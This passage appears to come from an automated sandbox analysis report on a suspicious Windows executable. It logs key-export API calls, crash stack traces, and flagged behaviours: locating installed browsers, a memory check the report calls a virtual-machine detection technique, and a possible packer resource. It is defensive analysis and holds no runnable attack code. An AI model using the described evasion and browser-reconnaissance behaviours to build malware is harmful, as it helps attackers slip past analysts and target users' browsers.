CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f83f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 30, 2023, 4:27 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (11 events)

Time & API	Arguments	Status
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: 0xb13d14 0xb13c36 0xb124dd 0xb120b6 0xb105a0 0xb1006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb13e08 registers.esp: 4583096 registers.edi: 4583148 registers.eax: 0 registers.ebp: 4583160 registers.edx: 8989008 registers.ebx: 4584044 registers.esi: 40367884 registers.ecx: 0	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: 0x61765c 0x61757e 0x6124dd 0x6120b6 0x6105a0 0x61006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72cd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ce264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ce2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72d974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72d97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72e21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72e21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72e21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72e2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x617750 registers.esp: 1765640 registers.edi: 1765692 registers.eax: 0 registers.ebp: 1765704 registers.edx: 6894528 registers.ebx: 1766588 registers.esi: 42365556 registers.ecx: 0	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: 0xa6765c 0xa6757e 0xa624dd 0xa620b6 0xa605a0 0xa6006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72cd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ce264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ce2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72d974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72d97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72e21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72e21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72e21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72e2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa67750 registers.esp: 1437080 registers.edi: 1437132 registers.eax: 0 registers.ebp: 1437144 registers.edx: 5122336 registers.ebx: 1438036 registers.esi: 42300464 registers.ecx: 0	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 48821516 registers.edi: 6324572 registers.eax: 48821516 registers.ebp: 48821596 registers.edx: 6 registers.ebx: 48821880 registers.esi: 2147746133 registers.ecx: 6304568	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6b626f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6b626e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6b6227a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6b622652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6b62253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6b622411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6b6225ab wmic+0x39c80 @ 0x459c80 wmic+0x3b06a @ 0x45b06a wmic+0x3b1f8 @ 0x45b1f8 wmic+0x36fcd @ 0x456fcd wmic+0x3d6e9 @ 0x45d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 846016 registers.edi: 1974991376 registers.eax: 846016 registers.ebp: 846096 registers.edx: 1 registers.ebx: 6052140 registers.esi: 2147746133 registers.ecx: 662209046	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 39055976 registers.edi: 6802020 registers.eax: 39055976 registers.ebp: 39056056 registers.edx: 6 registers.ebx: 39056340 registers.esi: 2147746133 registers.ecx: 6781784	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6b636f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6b636e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6b6327a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6b632652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6b63253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6b632411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6b6325ab wmic+0x39c80 @ 0xb29c80 wmic+0x3b06a @ 0xb2b06a wmic+0x3b1f8 @ 0xb2b1f8 wmic+0x36fcd @ 0xb26fcd wmic+0x3d6e9 @ 0xb2d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1829064 registers.edi: 1974991376 registers.eax: 1829064 registers.ebp: 1829144 registers.edx: 1 registers.ebx: 6510636 registers.esi: 2147746133 registers.ecx: 662578718	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 49213876 registers.edi: 4882748 registers.eax: 49213876 registers.ebp: 49213956 registers.edx: 7 registers.ebx: 49214240 registers.esi: 2147746133 registers.ecx: 4849440	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 